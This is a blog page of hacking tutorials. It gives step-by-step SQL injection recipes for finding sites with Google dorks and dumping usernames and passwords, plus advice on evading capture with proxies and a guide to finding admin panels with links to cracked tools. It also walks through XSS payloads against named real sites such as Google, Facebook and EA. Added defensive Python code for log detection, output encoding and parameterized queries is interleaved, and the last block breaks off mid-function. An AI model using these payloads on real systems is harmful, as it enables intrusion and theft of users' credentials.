
Monday, 10 November 2014

SQL Injection Tutorial For Beginners


What is a SQL Injection?

SQL injection is a technique that lets an attacker get inside a site's MySQL database by passing crafted input through the website itself.

What can I do with an SQLi?

You can extract data such as passwords, usernames and locations, and also change the site so that you can put whatever you want on it.

Is it hard to do?

At first, it may take you some time to get used to the queries. But after some practice, it's very easy.

Will I get caught?

If you are not using a proxy or VPN (Virtual Private Network), then yes, there is a chance that you may be caught. I suggest reading the Proxies and Socks forum here to learn more about what these are.

What is a dork?
A dork is a phrase that you see at the end of most URLs. In SQL injection, you search for dorks to find a website that looks as though it may be vulnerable to injection.

Injection Tutorial
Step 1.

Search Google by typing in a dork and clicking one of the websites that show up.

Common Dorks

inurl:members.php?id=
inurl:page.php?id=
inurl:login.php?id=
inurl:index.php?id=
inurl:register.php?id=
inurl:staff.php?id=
inurl:detail.php?id=
inurl:view.php?id=


So what does a dork do? It's a way of searching.
Put any one of the dorks above into Google search and it will yield a vulnerable site that can be used for testing.


Step 2. Once you have found a site, it's time that we check if it is vulnerable to a SQL Injection.

So let's say we have a site like this
Quote:http://www.site.com/index.php?id=1

What we do is put a ' (single quote) after the number in order to get an error to show up on the page.
Quote:http://www.site.com/index.php?id=1'

You should get an error like "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near line 1" or something.


Step 3. After getting the error, we know it's vulnerable to SQL injection. Now we have to find out how many columns it has. We use the "order by" clause to do this.


Quote:http://www.site.com/index.php?id=1 order by 10

Now, I suggest you go by 10s. If you did order by a number and it shows an error, that means to try a lower number. We want the highest number that gives no error, so that the number right after it gives an error.

So let's say we did:

order by 10 (error)
order by 7 (no error)
order by 8 (no error)
order by 9 (error)

What this means is that there are 8 columns.

Step 4. Now that we have the number of columns, it's time to figure out which column is vulnerable so that we can extract data from it. We can do this by putting a "-" minus sign after the = equals sign in the URL and by using union select. After union select, write every number from 1 up to the number of columns, separated by commas.

So here's how it should look:
Quote:http://www.site.com/index.php?id=-1 union select 1,2,3,4,5,6,7,8

After you do this, you should see one or more of those column numbers show up on the screen.

Step 5. Let's say the number 2 popped up on the screen. That means that column number 2 is vulnerable. Now we need to get the version of the database. We do this by selecting @@version.

Quote:http://www.site.com/index.php?id=-1 union select 1,@@version,3,4,5,6,7,8

Replace the number 2 in the url with @@version to get the version number to show up on your screen. Now the numbers that show up should either be 5.(some numbers) or 4.(some numbers).

For SQL Version 5 Injection:
Step 1. Now that we have the version number, it's time to get the names of the tables within the database. We use the group_concat(table_name) function. Since it's version 5, the tables are all catalogued in the built-in information_schema database. We end the query with -- so that the rest of the original query is treated as a comment.

Quote:http://www.site.com/index.php?id=-1 union select 1,group_concat(table_name),3,4,5,6,7,8 from information_schema.tables--

Step 2. On the screen, a bunch of names should pop up. Those are the names of the tables. Now look for anything that might contain the usernames and passwords of everyone who uses the website. Some common ones are users, admin, members, staff, user, etc.

Step 3. Once you have found something that might contain the usernames and passwords, it's time to get the name of the columns within that table. We use the group_concat(column_name) function to achieve this. And once again, in version 5, the columns are within information_schema.columns this time.

After information_schema.columns, you need to tell the database which table you want to extract the columns from. So after .columns, you put where table_name=(name of the table in hex form).
To convert the name of the table you're extracting from into hex form, you need to use an online converter. What I use is Text to Hex Converter. After you have the hex, put 0x before it, then copy all of the numbers/letters and paste them after the = equals sign.

So after all that it should look like this:
Quote:http://www.site.com/index.php?id=-1 union select 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_name=0x7573657273

The name of the columns should pop up on your screen.

Step 4. Now that you have the column names within the table name you chose, it's time to extract the data. Once again, we will use the group_concat function.

Let's say that the column names that showed up were username,password. To extract the information, we put group_concat(username,0x3a,password) from users-- (the table name that you chose, in text form, not hexed). (Note: 0x3a is the hex form of a colon, which separates the usernames and passwords so you don't get confused.) After you've done this, your URL should look like this:

Quote:http://www.site.com/index.php?id=-1 union select 1,group_concat(username,0x3a,password),3,4,5,6,7,8 from users--

Now the usernames of people should show up, then a colon, then the passwords of the usernames.


Thank you for reading

Saturday, 28 December 2013

String Based SQL injection

What is String Based SQL injection and how to notice them?
To make this simple to understand, String Based SQL injection happens when the site is vulnerable to SQL injection but doesn't show us the results that should be displayed after executing our SQLi query.
Commonly known signs that the site is vulnerable to String Based SQLi are:

Code:
"order by" doesn't work, example: order by 100--
"group by" doesn't work
"having 1=2" doesn't work
queries related to SQL injection don't work (the site will show a normal page even though it is vulnerable to SQLi)





Solution to this issue in order to hack a site with String Based SQL injection

The answer to this problem is to use the following format while trying to hack a site with SQLi:
Code:
http://site.com/index.php?id=10' order by 1000--+
That will show us the error, hence displaying the results according to our query.
The point here is that we used the quote ' and the + sign in our query:
Code:
id=X' order by--+

Alright, now that you've got the point, let's try String Based on some of the other types of SQL injection, shall we?



String-Union Based SQL injection
1. Obtaining the number of columns (in this example, we'll use 10 columns)
Code:
http://www.site.com/index.php?id=234' order by 11--+
The result shows an error, so we'll assume 10 columns, since this is just an example for our process.

2. Obtaining the Databases
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(schema_name,0x0a),7,8,9,10 from information_schema.schemata--+
Results will display the databases on their website
Note: If you don't know anything about UNION Based SQL injection, I suggest you read one of my tutorials to progress further in this step

3. Obtaining the Tables from the current Database

Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(table_name,0x0a),7,8,9,10 from information_schema.tables where table_schema=database()--+
Results will display the current table names
For this example, we'll be using the table name: "admin"

4. Obtaining Column names from a specific table (which in this example is "admin")

Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(column_name,0x0a),7,8,9,10 from information_schema.columns where table_name=0x61646d696e--+

Results will display the column names from the current table
To convert plain text to hex, use: http://www.swingnote.com/tools/texttohex.php

For this example, we'll use "username" and "password" as our column names

5. Obtaining Data from Column names

Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(username,0x3a,password,0x0a),7,8,9,10 from admin--+

Results will display the data given by the columns you have chosen

This can be also done with Error Based SQL injection, Blind Based and other types of SQL injection
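The request shapes that both SQL injection posts above walk through (the ' probe, order by counting, UNION SELECT against information_schema, and the string-based ' ... --+ form) leave a distinctive trail in a web server's access log. Here is an added detection example in Python, not part of either post: it parses constructed Apache-style log lines, URL-decodes each query parameter the way PHP would on the server, strips the /*!select*/ comment trick, and flags the techniques by name. The log lines, IP addresses and rule names are constructed for the example.

```python
import re
import urllib.parse
from collections import Counter

# Constructed Apache combined-log lines (not from any real server): the
# requests mirror the probes the tutorials describe (single-quote test,
# "order by" counting, UNION SELECT against information_schema, the
# string-based ' ... --+ form and a /*!select*/ variant), plus two benign
# requests, one of which ("order form by mail") is a false-positive trap.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Nov/2014:12:00:01 +0000] "GET /index.php?id=1 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Nov/2014:12:00:02 +0000] "GET /index.php?id=1' HTTP/1.1" 500 312
203.0.113.5 - - [10/Nov/2014:12:00:03 +0000] "GET /index.php?id=1%20order%20by%2010 HTTP/1.1" 500 312
203.0.113.5 - - [10/Nov/2014:12:00:04 +0000] "GET /index.php?id=-1%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables-- HTTP/1.1" 200 9000
203.0.113.5 - - [10/Nov/2014:12:00:05 +0000] "GET /index.php?id=234'%20order%20by%2011--+ HTTP/1.1" 200 5120
203.0.113.5 - - [10/Nov/2014:12:00:06 +0000] "GET /index.php?id=-1%20union%20/*!select*/%201,0x7573657273,3-- HTTP/1.1" 200 700
198.51.100.7 - - [10/Nov/2014:12:00:07 +0000] "GET /index.php?id=42 HTTP/1.1" 200 5120
198.51.100.7 - - [10/Nov/2014:12:00:08 +0000] "GET /search.php?q=order+form+by+mail HTTP/1.1" 200 2000
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Each rule names one of the techniques the tutorials walk through.
RULES = {
    "quote_break":  re.compile(r"^-?\d+'"),                    # id=1'  (the error probe)
    "order_by":     re.compile(r"\border\s+by\s+\d+"),          # column counting
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "info_schema":  re.compile(r"\binformation_schema\."),
    "db_probe":     re.compile(r"@@version|\b(user|database|version)\(\)"),
    "hex_literal":  re.compile(r"\b0x[0-9a-f]{2,}\b"),          # 0x3a, hexed table names
    "comment_tail": re.compile(r"(--|#)\s*$"),                  # -- or --+ terminator
}
STRONG = {"union_select", "info_schema"}


def normalise(value):
    """Lower-case, strip MySQL /*!...*/ and /*...*/ comments, collapse whitespace."""
    v = value.lower()
    v = re.sub(r"/\*!\d*\s*|\*/", " ", v)   # /*!select*/ -> select
    v = re.sub(r"/\*.*?\*/", " ", v)        # ordinary inline comments
    return re.sub(r"\s+", " ", v).strip()


def analyse_line(line):
    """Return a list of findings (possibly empty) for one log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    query = urllib.parse.urlsplit(m.group("target")).query
    findings = []
    # parse_qsl decodes %XX and turns '+' into a space, as PHP does on the
    # server, so "--+" is seen as the "-- " comment it becomes there.
    for name, raw in urllib.parse.parse_qsl(query, keep_blank_values=True):
        value = normalise(raw)
        hits = [rule for rule, rx in RULES.items() if rx.search(value)]
        if hits:
            severity = "high" if STRONG & set(hits) or len(hits) >= 2 else "medium"
            findings.append({"ip": m.group("ip"), "status": m.group("status"),
                             "param": name, "rules": hits, "severity": severity})
    return findings


def scan(log_text):
    findings = []
    for line in log_text.splitlines():
        findings.extend(analyse_line(line))
    return findings


def per_source(findings):
    """Flagged requests per client IP: the step-by-step probing is a burst from one address."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for f in results:
        print(f"{f['severity']:6} {f['ip']:12} {f['status']} {f['param']}={','.join(f['rules'])}")
    print(dict(per_source(results)))
```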



How to find admin pages

Today I'm going to show how to find admin panels when you have the info to log in.

There's a few options to find it.

1) Adding to URL

http://www.site.com/admin
http://www.site.com/administrator
http://www.site.com/admin.php
http://www.site.com/login

2) Online scanning (Link is at the end)



3) Perl scripts (Script and Active Perl link will be on end of this page)

For this you will need to install ActivePerl...

4) Programs (Links at the end of the thread)

You can use Havij or Reiluke's admin finder

5) Scan ports (Link at the end of the thread)

For that use nMap. First you need to get your website's IP address.
Go to cmd (start>run>cmd) and type ping site.com (without http://www.). After that paste the IP into nMap and click 'Scan'.
When finished, pick the tab 'Ports/computers'.


6) Crawl website (Link + crack to acunetix)

Just scan all files and folders on the site. Acunetix is the right tool.

7) robots.txt

Check robots.txt
http://www.site.com/robots.txt

8) Google

Dork: site:webpage.com "admin"
site:webpage.com "login"

Downloads and links:

Online scanner -> http://sc0rpion.ir/af/

Download Perl -> http://www.activestate.com/activeperl/downloads
Perl script -> http://pastebin.com/WWZszURW

Havij (Uploaded by me) -> http://www.mediafire.com/download.php?s2iiaabz87i7t8a
Reiluke admin finder (Uploaded by me) -> Automatic download

nMap -> http://nmap.org/download.html

Acunetix (Uploaded by me) -> http://www.mediafire.com/download.php?vam13z7pe1b85kl

Password for locker .rar is

www.reiluke.i.ph

XSS [Behind the mask]

What is XSS?

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications that enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites accounted for roughly 80.5% of all security vulnerabilities documented by Symantec as of 2007.[1] Their effect may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner. (explanation from Wikipedia)

Let’s XSS


XSS is not just pasting XSS attack vectors into search boxes and address bars; you have to know where that input is going, how it is being parsed, etc. If you want to learn how to find XSS holes on pages, first you need at least basic knowledge of HTML, JavaScript and a little bit of PHP. So in this paper I will go over some XSS-vulnerable websites from XSSed.com, and we will review the source code of those vulnerable sites. My main goal is to show you how to properly build your XSS attack vector.

I will not:
1. Show you how to steal cookies
2. Take responsibility for your actions after you read this paper.

Our first site will be:
1.
Code:
http://www.un.lk/media_centre/press_releases.php?id=#

Let's try and change the # to something else, for example id=XSSTest, and we see that no error is shown, so we can assume that the webpage has accepted our input. Let's see where in the source our XSSTest string is located.

Source of [http://www.un.lk/media_centre/press_releases.php?id=XSSTest ] :


Great, in both examples we are already inside JavaScript.

But this doesn't prove anything; let's see whether <> will be parsed, so next we go:
[www.un.lk/media_centre/press_releases.php?id=<script>]

Source of [www.un.lk/media_centre/press_releases.php?id=<script>] : 

[Image: untitled2.jpg]

Great, our input is not being encoded; if it were, we would see &lt;script&gt; instead of <script>.

I will show you 2 options how to exploit it :

1. jshow(<script>): here you can see we are already inside the JavaScript, so we can just do
Code:
www.un.lk/media_centre/press_releases.php?id=alert(0)
and our alertbox will be executed. Why, you ask? Look at the source code:

[Image: slika3.jpg]

Our alertbox is taken as valid input and processed by our browser, and there you have the alertbox. [ onload= ] is a JScript event that triggers when the page is loaded, so when you call it, onload="Here is where javascript is located", everything inside the onload event will be processed as valid input, and so is our alert(0).

2. Every element on a webpage has its opening [ < ] and closing [ > ] tag.
);jshow(<script>);"> as you can see, closing is done with );"> so it goes like this: alert(0) );">, so for our XSS to work we must close the body tag and start a new <script> tag. So in this case we use:

Code:
www.un.lk/media_centre/press_releases.php?id=);"><script>alert(0)</script>

Source code :

[Image: untitled4.jpg]

You see, we closed the body tag and started a new <script> tag, and because it's valid it is executed.

Also another way is :

<script language="javascript" type="text/javascript" defer="defer">

news_toggle_visibility(<script>);

</script>

To escape the tag we use );</script><script>alert(0)</script> (we closed the existing <script> with );</script> and started a new one, <script>alert(0)</script>).

The url is :
Code:
http://www.un.lk/media_centre/press_releases.php?id=);</script><script>alert(0)</script>

Source:

[Image: untitled5.jpg]

Or we can do this:

Code:
http://www.un.lk/media_centre/press_releases.php?id=);</script><script>alert(0)</script><script>alert(12

In the solution before, we saw there is a ); left after our injected XSS vector, so here is the source:

[Image: untitled6.jpg]

We just added the <script>alert(12 vector, and the );</script> just closed our injected script tag.

Code:
http://www.chip.de/ii/grossbild_v2.html?sales=2122

Time to review the code. After searching for the value 2122 inside the source code we get:

[Image: untitled7.jpg]

As you can see, like in our first example we are already inside a <script> tag, but in this case we have to close the value and input new JScript code. In our case we have "2122"; so the first part of our XSS vector will be ";. So let's try "; alert(0);

Code:
http://www.chip.de/ii/grossbild_v2.html?sales="; alert(0);

Source :

[Image: untitled8.jpg]

As you can see, we are inside the script but no alertbox is shown. Why is that? It's because of the "; after our XSS attack vector: every value assigned to a variable has an opening " and a closing ", and in our case we have closed the somtr.prop48=" value with "; but there is a "; left unclosed. You can see the problem: the first value is closed, but what about the third "? We have to close it too, so our XSS link will be:

Code:
http://www.chip.de/ii/grossbild_v2.html?sales="; alert(0); MaXoNe="XSS

So lets see the source :

[Image: untitled9.jpg]

As you can see, we closed the third " and our alertbox is shown, so the rule is: try to close either every tag or every value with your XSS attack vector. You will have fewer errors on the page you are XSSing and your XSS vector will look cooler.

Code:
http://www.bhtelecom.ba/korisnicki_portal.html?&no_cache=1 [POST][Self XSS]

Self XSS is an XSS attack that is triggered when the user enters the payload inside the vulnerable input box; it takes SE (social engineering) for this type of XSS. Unlike the GET method, where we can see our XSS payload in the address bar of our browser, the POST method won't show you what the webpage is sending to the server, so we have to use tools to see what POST values we are sending. We can use:

1. Live HTTP headers [http://www.youtube.com/watch?v=bz7KGhraX-0 ]
2. BurpSuite Proxy [lookup Hooded Robin’s tut on that]

Here we have two input boxes, one says "Login ili mobitel" and the other "Lozinka", so let's input something into those two boxes and press the OK button.
Let's input Text"<>/\ in the "Login ili mobitel" field and Text2"<>/\ in the "Lozinka" field. We get an error, but let's see where our input went. Here is the source:

[Image: untitled10.jpg]

We see that our input changed the source code: the first value, from the login input box, closed the src value:

src="https://portal.bih.net.ba/amserver/UI/Login?Login.Token1=Text\"<>/\\

And we can see that our input is not being encoded, so let's now try this:

First input box : TestXSS
Second input : "></iframe></div><script>alert(0)</script>

And when we press the OK button we get an alert box. Let's see why:

[Image: untitled11.jpg]

What happened:

"> ----that closed src value in opened iframe tag :

<iframe src="https://portal.bih.net.ba/amserver/UI/Login?Login.Token1=sss&Login.Token2=\">

</iframe> ---- closed iframe tag :

<iframe src="https://portal.bih.net.ba/amserver/UI/Login?Login.Token1=sss&Login.Token2=\"></iframe>

<script>alert(0)</script> --- new script tag with alertbox

And that's it, we escaped the iframe tag with "></iframe> and added a new script tag <script>alert(0)</script>. To hide any errors use either

1. "></iframe></div><script>alert(0)</script><!-- (comments out the rest of the code)
2. "></iframe></div><script>alert(0)</script><iframe> (figure it out)

And now, maybe you think that XSS attacks can't do any damage, but big companies like Google and Facebook have reward programs for XSS findings on their sites, because XSS attacks can be used to steal users' cookies [http://jehiah.cz/a/xss-stealing-cookies-101], and when you consider that big companies have millions of users, a vulnerability like XSS can have a devastating effect.
So let's analyze a Google XSS vulnerability which was found by ElvinGuitar, a user from HackForums.net:

Vuln. link :
Code:
https://www.google.com/voice/rates?p=
Lets try :
Code:
https://www.google.com/voice/rates?p=XSSTest

We get the same page, so our input is accepted. Now let's review the code:

[Image: untitled12.jpg]

Here is our input. Let's evaluate how we can exploit it: first we notice we are inside the script, and we have '); as the first part of our XSS attack vector, so let's do this:

Code:
https://www.google.com/voice/rates?p='); alert(0);</script>

So this is the result:

<script>
var callingRatesPage = new _callingRatesPage(
'en',
'USD','';); alert(0);</script>');
callingRatesPage.render(document.getElementById('calling-rates-page'));
</script>


We closed the value with ');, added our alert event alert(0);, closed the script tag with </script>, and we get our alert box.

Seems easy, doesn't it? Well, ElvinGuitar got 1000$ for that XSS.

And now facebook :

Code:
http://www.facebook.com/ads/create/photos/creative_uploader.php?controller_id=c4c288b438ed080&path=whatever&src=whatever&vol=90&w=60&h=80&post_upload=1

So here is one piece of advice: try searching for the values from the URL inside the source code. In this case we would search for the c4c288b438ed080 value, and this is what we get. You should also search for every value after an = in the URL and see where it is located. Here is the source code:

<script>
...
onloadRegister(function (){window.parent.__UIControllerRegistry["c4c288b438ed080"].saveUploadedImage("whatever", "whatever", 90, 60, 80);});
...
</script>


Nice, so let's replace c4c288b438ed080 with Test<>"\/ and we get this:

Code:
http://www.facebook.com/ads/create/photos/creative_uploader.php?controller_id= Test<>\/&path=whatever&src=whatever&vol=90&w=60&h=80&post_upload=1

And the source code :

<script>
...
onloadRegister(function (){window.parent.__UIControllerRegistry["Test<>\/ "].saveUploadedImage("whatever", "whatever", 90, 60, 80);});
...
</script>


Great, our input is not being encoded, so we see we are inside the {[ ]}; brackets, so we have to close that value with MaXoNe"]}; alert(0); // and so the URL will be:

Code:
http://www.facebook.com/ads/create/photos/creative_uploader.php?controller_id=MaXoNe"]}; alert(0); // &path=whatever&src=whatever&vol=90&w=60&h=80&post_upload=1

And source code:

<script>
...
onloadRegister(function (){window.parent.__UIControllerRegistry["MaXoNe"]};alert(0); //"].saveUploadedImage("whatever", "whatever", 90, 60, 80);});
...
</script>


What happened? Well, "]}; closed the value, alert(0); triggered our alertbox, and // is used to comment out the rest of the code all the way to the </script>.

We could use this too :

Code:
http://www.facebook.com/ads/create/photos/creative_uploader.php?controller_id=MaXoNe"]}; alert(0); </script><!--&path=whatever&src=whatever&vol=90&w=60&h=80&post_upload=1

The difference is that we closed the script tag and commented the rest of the code , like this :

<script>
...
onloadRegister(function (){window.parent.__UIControllerRegistry["MaXoNe"]};alert(0); </script><!--"].saveUploadedImage("whatever", "whatever", 90, 60, 80);});
...
</script>


The rest of the line (highlighted green in the original) is commented out because of the <!--.

And this one I found on ea games site :

Code:
http://www.ea.com/search?q=

So lets try :
Code:
http://www.ea.com/search?q=Test<>/\"

And lets see what we got :

[Image: untitled13.jpg]

We see that <> is filtered (deleted) but " is not being encoded. Now we know that we can escape the value of title="", so the first part of our XSS payload is ". What can we do next? Let's see: first, we can't use < > so no script, img, body or any other tag, but we are inside the <h1> tag, which is the heading, and there are JScript events that can be used by almost every HTML element, like:

onmouseover= runs JScript code when the user moves the mouse over the HTML tag the event belongs to.

onclick= runs JScript code when the user clicks on the HTML tag the event belongs to.

ondblclick= runs JScript code when the user double-clicks on the HTML tag the event belongs to.

onmouseout= runs JScript code when the cursor leaves the area of the HTML tag the event belongs to.

So we can do this :
Code:
http://www.ea.com/search?q="onclick="alert('MaXoNe');""
With " we escaped the value, added the onclick=alert("MaX"); event, and with the next " we closed the value that was left behind; or we can use " onclick=alert("MaX"); //.
With // we comment out the rest of the code all the way to >. So when we click the heading we get an alertbox.

SQLi and XSS

URL from zerofreak’s SQLi tutorial on HF.

Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11--
There are vulnerable columns shown on the page; we will select column 8, so let's see the source:

[Image: untitled19.jpg]

We will use :

Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,'</font><script>alert(/maxone/)</script><font>',9,10,11--

Look at the source and figure it out , it’s time for you to do something.

Or if magic_quotes is enabled we can bypass it by hexing our value:

Code:
http://www.armorysquareofsyracuse.com/main/shopping.php?id=179 and false union /*!select*/ 1,2,0x3c2f7469746c653e3c7363726970743e616c6572742830293c2f7363726970743e,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--

Where 3c2f7469746c653e3c7363726970743e616c6572742830293c2f7363726970743e is </title><script>alert(0)</script>.
Again, review the source to find out why I used this payload.

That's all from me. My advice: go to XSSed.com, look at the mirrors, search the code, try different XSS payloads, be creative.
Also, if you want to be a good XSSer, master HTML and JScript; there is no other way.
Knowledge is power.
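Every case in this post, the SQLi-plus-XSS one included, comes down to where the input lands (inside a JS string, inside an attribute, JS inside an attribute) and whether the server encoded it for that context. As an added example, not from the post or any site named in it, the following Python renders the post's payloads (copied in shape, not taken from any live site) through templates modelled on the quoted snippets, once unsafely and once with an encoder matched to each context, and checks that the script block and attributes stay intact. The template and function names are invented for the example.

```python
import html
import json

# Constructed payloads, copied in shape from the post above, each with the
# context it landed in.
POST_PAYLOADS = {
    "google_rates": "'); alert(0);</script>",           # inside a single-quoted JS string
    "chip_value":   '"; alert(0); MaXoNe="XSS',          # inside a double-quoted JS string
    "ea_heading":   '"onclick="alert(\'MaXoNe\');""',    # inside an HTML attribute value
    "un_onload":    ');"><script>alert(0)</script>',     # JS argument inside an onload attribute
}


def js_string_literal(value):
    """Return a complete double-quoted JavaScript string literal for `value`.

    json.dumps already escapes backslashes, double quotes and control
    characters; the extra replacements keep <, >, & and ' out of the output,
    so the literal can never contain "</script>" or break out of a quoted
    HTML attribute.  The template must not add quotes of its own.
    """
    out = json.dumps(value)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"),
                    ("&", "\\u0026"), ("'", "\\u0027")):
        out = out.replace(ch, esc)
    return out


def round_trips(value):
    """The encoded literal still decodes to the original value (nothing is lost)."""
    return json.loads(js_string_literal(value)) == value


def render_calling_rates_unsafe(p):
    """The shape the post exploited: the raw value pasted between the quotes."""
    return ("<script>var callingRatesPage = new _callingRatesPage('en','USD','"
            + p + "');</script>")


def render_calling_rates(p):
    """Script-block context: the value becomes a whole JS string literal."""
    return ("<script>var callingRatesPage = new _callingRatesPage('en','USD',"
            + js_string_literal(p) + ");</script>")


def render_search_heading(q):
    """HTML attribute context (the ea.com <h1 title="..."> case)."""
    return '<h1 title="' + html.escape(q, quote=True) + '">Results</h1>'


def render_onload(id_value):
    """JS inside an HTML attribute (the un.lk onload="jshow(...)" case): encode
    for the inner JS string first, then for the attribute that wraps it, so
    both the HTML parser and the JS parser see only data."""
    inner = js_string_literal(id_value)
    return '<body onload="jshow(' + html.escape(inner, quote=True) + ')">'


def script_block_is_intact(rendered):
    """True when the only <script ... </script> in the output are the template's own."""
    low = rendered.lower()
    return low.count("<script") == 1 and low.count("</script") == 1


def attribute_is_intact(rendered):
    """True when only the template's own two quote characters survive, so the
    value could neither close the attribute nor start a new tag."""
    return rendered.count('"') == 2 and "<script" not in rendered.lower()


def check_all():
    """Each payload through the matching encoder, plus the unsafe contrast."""
    return {
        "unsafe_google": script_block_is_intact(render_calling_rates_unsafe(POST_PAYLOADS["google_rates"])),
        "google": script_block_is_intact(render_calling_rates(POST_PAYLOADS["google_rates"])),
        "chip": script_block_is_intact(render_calling_rates(POST_PAYLOADS["chip_value"])),
        "ea": attribute_is_intact(render_search_heading(POST_PAYLOADS["ea_heading"])),
        "un": attribute_is_intact(render_onload(POST_PAYLOADS["un_onload"])),
    }


if __name__ == "__main__":
    for name, ok in check_all().items():
        print(f"{name:14} {'inert' if ok else 'BROKEN'}")
```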

Friday, 11 October 2013

SQL injection Tutorial





FOR EDUCATIONAL PURPOSES



Finding vulnerable sites
Finding amount of columns
Getting mysql version current user
Getting Databases
Getting Tables
Getting Columns
Getting Usernames and Passwords






1. Finding vulnerable sites


To find Vulnerable sites you are going to use Google Dorks.

Some common dorks are:

====================================================================

Code:


inurl:index.php?id=
inurl:news.php?id=
inurl:category.php?id=
inurl:games.php?id=
inurl:forum.php?tid=
inurl:newsletter.php?id=
inurl:content.php?id=


=================================================================


lets say you got this site:

=============================================
Code:


http://site.com/news/view.php?id=828
============================================
If we add a ' before or after the number, it should look something like this if it's vulnerable:



2. Finding amount of columns



To find the right amount of columns we are using "order by". here is how it works:


===============================================================


Code:

http://site.com/news/view.php?id=828 order by 1-- (page loads normal)
http://site.com/news/view.php?id=828 order by 2-- (page loads normal)
http://site.com/news/view.php?id=828 order by 3-- (page loads normal)
http://site.com/news/view.php?id=828 order by 4-- (page loads normal)
http://site.com/news/view.php?id=828 order by 5-- (page loads normal)
http://site.com/news/view.php?id=828 order by 6-- (page loads normal)
http://site.com/news/view.php?id=828 order by 7-- (page loads normal)
http://site.com/news/view.php?id=828 order by 8-- (page loads normal)
http://site.com/news/view.php?id=828 order by 9-- (error)

===============================================================

This means our site has 8 columns and we will now move over to "union select".


This is how it works:
===============================================================
Code:


http://site.com/news/view.php?id=-828 union select 1,2,3,4,5,6,7,8--

===============================================================


Note the hyphen - before the numbers!
===============================================================


This should make the website show some numbers on the screen, like this:




===============================================================

This means it's absolutely certain that the site is vulnerable to SQL injection.


3. Getting MySQL version and Current User



Now we want to know the MySQL version. If it's over 5 then it's injectable by this tutorial (if it's under 4 then you have to guess tables and columns).



Code:


http://site.com/news/view.php?id=-828 union select 1,2,@@version,4,5,6,7,8--








To get the Current user you type this:


===============================================================

Code:


http://site.com/news/view.php?id=-828 union select 1,2,user(),4,5,6,7,8--

===============================================================


This should display:










4. Getting Databases





Now we wanna find the databases and the Current database.

Here the syntax for all databases:

===============================================================


Code:


http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(schema_name),4,5,6,7,8 from+information_schema.schemata--


===============================================================

It should display something like this:







Now we would like to know what the current database is. It's pretty obvious in this case, but useful sometimes.


Syntax for current database:

===============================================================

Code:


http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,database(),4,5,6,7,8


===============================================================

This should display something like this:










5. Getting Tables




Now we want to know the tables in the database, and for this we will continue using "union select".


===============================================================

Code:


http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables where table_schema=database()--


===============================================================


This should display something like this:








We now know that the table the passwords should be stored in is called bpusers; write it down and move on.


6. Getting Columns



Now we want to know the columns.



============================================================

Code:


http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(column_name),4,5,6,7,8 from information_schema.columns where table_schema=database()--


============================================================

This should display something like this:






7. Dumping users/pass





Now you would like to dump logins and passwords from bpusers.


Here is the code for that:

==================================================================
Code:


http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(login,0x3a,password,0x3a),4,5,6,7,8 from bpusers--

======================================================




(NOTE: 0x3a will make a : between logins and passwords.)



You have now performed a SQL injection attack.
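Both this tutorial and the beginners' tutorial at the top of the page depend on the same server-side query shape: the id parameter is concatenated into the SQL text. As an added example that is not part of either post, here is that shape beside its parameterized form in Python, with an in-memory SQLite database standing in for the site (the table names, row values and function names are constructed); SQLite accepts the same UNION SELECT and -- comment syntax the tutorials use, and the fixed versions give the order by and UNION SELECT probes nothing to work with.

```python
import sqlite3


def make_demo_db():
    """Constructed stand-in for the tutorial's site: one news row and one login row."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, slug TEXT, title TEXT);
        CREATE TABLE bpusers (login TEXT, password TEXT);
        INSERT INTO news VALUES (828, 'site-news', 'Hello world');
        INSERT INTO bpusers VALUES ('admin', 'constructed-password-hash');
    """)
    return conn


def view_news_vulnerable(conn, raw_id):
    """The query shape every step of the tutorial depends on: the id parameter
    is pasted into the SQL text, so whoever controls it writes part of the query."""
    sql = "SELECT id, slug, title FROM news WHERE id=" + raw_id
    return conn.execute(sql).fetchall()


def view_news_fixed(conn, raw_id):
    """Check the type first, then bind the value; the SQL text never changes.
    Anything that is not an integer (a quote, 'order by', 'union select')
    is rejected before the database sees it."""
    try:
        id_num = int(raw_id)
    except (TypeError, ValueError):
        return []
    return conn.execute(
        "SELECT id, slug, title FROM news WHERE id=?", (id_num,)).fetchall()


def view_news_by_slug_fixed(conn, raw_slug):
    """Same for a string parameter (the string-based post's id='...' case):
    with binding, a quote in the value is data, so ' order by 1000-- is just
    a slug that does not exist."""
    return conn.execute(
        "SELECT id, slug, title FROM news WHERE slug=?", (raw_slug,)).fetchall()


def order_by_probe_errors(conn, raw_id):
    """True if the concatenated query raises; this error-or-not signal is what
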